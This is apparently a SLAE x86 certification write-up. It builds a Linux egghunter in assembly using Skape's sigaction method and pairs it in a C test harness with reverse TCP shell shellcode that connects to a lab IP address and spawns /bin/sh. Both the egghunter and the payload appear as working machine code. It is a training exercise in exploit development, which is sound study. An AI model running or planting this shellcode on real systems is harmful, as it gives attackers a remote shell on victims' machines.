SLAEx86 - Assignment 3
The third assignment for the SLAEx86 certification includes the following requirements:
- Study about the Egg Hunter shellcode
- Create a working demo of the egghunter
- Should be configurable for different payloads
This assignment involved a lot of research. I particularly paid extra attention to a paper written by Skape that is routinely referenced on the topic of egghunters.
For this assignment I used the sigaction method that is outlined in the aforementioned paper as the foundation to building my egghunter. I also used the shellcode generated from Assignment 2 in my final assembly program to execute the egghunter code.
Step 1: Egghunter Code
Using Skape’s paper I built the following egghunter assembly code that uses the value 0x50905090 as the “egg”.
; Filename: egghunter.nasm global _start section .text _start: ; sigaction method ; Reference: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf alignp: or cx, 0xfff ; align page egg: inc ecx push byte +0x43 ; set syscall to sigaction 67 pop eax ; set eax to sigaction syscall int 0x80 ; call syscall cmp al, 0xf2 ; check sigaction for EFAULT jz alignp ; If EFAULT check next address mov eax, 0x50905090 ; set the egg value mov edi, ecx ; address to validate scasd ; scan string to compare eax and edi jnz egg ; If no match try next address scasd ; If match try next 4 bytes jnz egg ; Try the next 4 bytes if no match jmp edi ; egg located
Using the command-linefu objdump command I extracted the egghunter.nasm shellcode:
[email protected]:~/Desktop/Assembly/SLAE_Exam/Assignment3$ objdump -d ./egghunter|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' "\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7"
Step 2: Use Egghunter Shellcode to Gain Reverse Shell
Taking the shellcode of the egghunter.nasm file, I adapted the shell C program with the shellcode from Assignment 2.
// Filename: egghunter_x86linux.c // 30 bytes egg hunter shellcode using sigaction syscall // Shellcode used - Reverse TCP Shell // Author: tekman /* Assembly code: global _start section .text _start: ; sigaction method ; Reference: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf alignp: or cx, 0xfff ; align page egg: inc ecx push byte +0x43 ; set syscall to sigaction 67a pop eax ; set eax to sigaction syscall int 0x80 ; call syscall cmp al, 0xf2 ; check sigaction for EFAULT jz alignp ; If EFAULT check next address mov eax, 0x50905090 ; set the egg value mov edi, ecx ; address to validate scasd ; scan string to compare eax and edi jnz egg ; If no match try next address scasd ; If match try next 4 bytes jnz egg ; Try the next 4 bytes if no match jmp edi ; egg located */ #include<stdio.h> #include<string.h> unsigned char egg[] = \ "\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7"; unsigned char code[] = \ "\x90\x50\x90\x50\x90\x50\x90\x50" /* egg do not remove! */ "\x31\xc0\xb0\x66\x31\xdb\x53\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xc0\xb0" "\x66\x31\xdb\xb3\x03\x68\xc0\xa8\xbe\x83\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51" "\x56\x89\xe1\xcd\x80\x31\xc0\x31\xc9\xb0\x3f\x89\xf3\xcd\x80\x31\xc0\x31\xc9\xb0\x3f\xb1" "\x01\xcd\x80\x31\xc0\x31\xc9\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68" "\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; void main() { printf("Egg Hunter Shellcode Length: %d\n", strlen(egg)); printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())egg; ret(); }
After compiling the egghunter_x86linux.c program and starting a listener on my Kali box I executed the C program and successfully retrieved a reverse shell.
And the egghunter shellcode is successful!